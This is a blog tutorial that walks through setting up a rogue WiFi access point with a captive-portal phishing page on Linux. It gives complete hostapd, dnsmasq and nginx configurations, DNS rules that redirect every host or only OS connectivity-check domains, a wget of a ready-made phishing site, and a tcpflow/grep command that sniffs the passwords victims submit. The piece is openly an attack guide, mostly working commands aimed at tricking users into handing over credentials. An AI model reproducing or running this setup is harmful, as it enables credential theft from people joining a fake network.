How to Setup Captive Portal Login with Rogue AP (nginx)

by hash3liZer . 12 January 2019

How to Setup Captive Portal Login with Rogue AP (nginx)

In an earlier tutorial, we hosted a Rogue Access Point with hostapd and dnsmasq and later forwarded traffic to provide internet access. Here, we will cover how to setup a captive portal login page that would make the attack more effective by popping the phishing page or by showing a sign-in notification when the user connects to our Access Point. The mere concept of Captive Portal login is redirection.

So, how does a captive portal work? When a user, let's say a window user connects to the Access Point, window will make a request to a random site (different for users) and depending upon the response from the site, window then decides that which action to perform. In Captive portal case, if the window receives a redirection (302) response code from the site, it will assume as if there is some sort of proxy in place that needs to be authenticated.

Finally, the page will be redirected to the rogue website and window will convey our message of authenticating with the phishing page. In Rogue AP tutorial, we used apache as our webserver for web hosting. Here, we will replace apache with nginx because of its simple configuration and directives.

STEP 1

Installation

To acheive our objective, we will perform the step as a whole. Install nginx and other required tools and update your repositories:

$ apt update
$ apt install hostapd dnsmasq nginx

Then put your wireless interface in monitor mode:

$ airmon-ng start wlan1

STEP 2

Rogue Access Point

We are about to use hostapd for hosting our Access Point. But this time, with a bit amendment, here's a link for hosting an access point with roguehostapd which infact would make the task more easier by replacing the actual configuration with a few arguments. 

Create and save the hostapd configuration for Access Point:

$ nano /tmp/hostapd.conf
interface=wlan1mon
driver=nl80211
ssid=[Fake AP Name] 
hw_mode=g
channel=[Fake AP Channel]
macaddr_acl=0
ignore_broadcast_ssid=0

Start hostapd service:

$ hostapd /tmp/hostapd.conf

STEP 3

DHCP Server

Now, we need a DHCP server to setup a small network provide the connecting users with ip addresses. We will use dnsmasq for the purpose. Create and save a new configuration file for dnsmasq:

$ nano /tmp/dnsmasq.conf
interface=wlan1mon
address=/#/192.168.1.1
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Up here in the configuration we used a field address. What it does is redirect all the ip addresses and hosts to a single ip as provided and in our case it is the gateway address where our forged website will reside:

address=/#/192.168.1.1

Just in case you want to redirect only a few sites, you will have to explicitly define each site individually followed by slash and the site to be followed. This way is used when you are willing to provide internet access to the users. For example:

address=/facebook.com/192.168.1.1
address=/google.com/192.168.1.1
address=/youtube.com/192.168.1.1

But we don't want it here for we want to give maximum redirects. It's because we don't know a user is going to request which site. So, why don't redirect all?

Start dnsmasq service:

$ dnsmasq -C /tmp/dnsmasq.conf -d

Finally, execute these two commands to assign gateway ip and netmask to your interface:

$ ifconfig wlan1mon up 192.168.1.1 netmask 255.255.255.0
$ route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

STEP 4

Captive Portal

Here starts the actual work. Create a new directory to place your website and move to that directory. I would name it captive_portal.

$ mkdir /var/www/captive_portal
$ cd /var/www/captive_portal

Now, download the Rogue AP website and extract the files under this directory:

$ wget https://www.shellvoide.com/media/files/rogueap.zip
$ unzip rogueap.zip -d ./

Now, you would have files placed under your captive_portal directory. All we need now is to setup nginx configuration for our captive portal project. First, remove enabled sites from nginx configuration directory:

$ rm /etc/nginx/sites-enabled/*

Now, create a new configuration file for your captive portal project and place the following directives and then save the file:

$ nano /etc/nginx/sites-enabled/captive_portal
server{
    listen 80;
    root /var/www/captive_portal;        

    location / {
        if (!-f $request_filename){
            return 302 $scheme://192.168.1.1/index.html;
        }
    }
}

What is happening behind in the nginx configuration is whenever a file which doesn't exist is requested by the user, the request will be redirected to our fake page i.e. 192.168.1.1 which is exactly what we are trying to accomplish. You should note that this is the most important part where the non-existent files are being redirected. The directive root specifies the directory where the website is placed. Finally, reload the nginx service:

$ service nginx reload
$ service nginx restart

Check if nginx is correctly serving our fake page:

$ service nginx status

STEP 5

Capture Password

Since, we have our servicable access point along with a forged document, we need a way to capture the password credentials. Previously, we used MySQL database to store the data. However, there's even a better approach. Let's do sniffing and capture what is posted in the network. Open a terminal and execute this command:

$ sudo tcpflow -i any -C -g port 80 | grep -i "password1="

What is happening is we are capturing the whole network traffic on every interface and then piping it to grep which will look for specific lines. I've set this up according to what will be POSTed when a user will enter password and press Enter on Captive Portal Login page. It will print data on screen when entered on the forged website: 

STEP 6

Internet Forwarding (Optional)

The last step is to provide our users with internet facility. However to acheive it would be a bit controversial. What we need to do is change or uncomment the address field in dnsmasq configuration. But if we do then Captive Portal will no longer work. So, what to do?

To overcome this complication, i.e. to provide internet as well as Captive Portal should also be served, the address field is to be explicitly defined for a set of given sites. For example, to only redirect android based operating systems, the address field would be:

address=/clients3.google.com/192.168.1.1

The same could be applied to other websites as well. There are multiple sites which are to be correctly redirected for this. I don't know all of them but some of those famous and widely implemented sites can be configured:

interface=wlan1mon
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

address=/clients3.google.com/192.168.1.1
address=/gsp1.apple.com/192.168.1.1
address=/.akamaitechnologies.com/192.168.1.1
address=/www.appleiphonecell.com/192.168.1.1
address=/www.airport.us/192.168.1.1
address=/.apple.com.edgekey.net/192.168.1.1
address=/.akamaiedge.net/192.168.1.1
address=/.akamaitechnologies.com/192.168.1.1
address=/captive.apple.com/192.168.1.1
address=/ipv6.msftncsi.com/192.168.1.1
address=/www.msftncsi.com/192.168.1.1

Then restart dnsmasq with this configuration.

Finally, we need another interface which have internet connection and the traffic from this interface will be forwarded to the access point interface. I've my this interface named wlan0 from where i will redirect traffic to wlan1mon. Execute the following commands with your respective interfaces:

$ iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
$ iptables --append FORWARD --in-interface wlan1mon -j ACCEPT

Now, just one step to go...

$ echo 1 > /proc/sys/net/ipv4/ip_forward

It's all setup. Pick up your mobile, connect to the Rogue Access Point and see for yourself. If you enter password in the fields and press enter, the captured data will be printed in tcpflow terminal:

Conclusion

The conclusion that can be drawn from all of the above is users can easily be tricked into performing some unexpected tasks when it comes to wifi. With the help of captive portal login the overall performance and interactivity of the Access Point increases and the attack becomes more surfaced. Above all, the working of captive portal is merely placed upon the principle of redirection.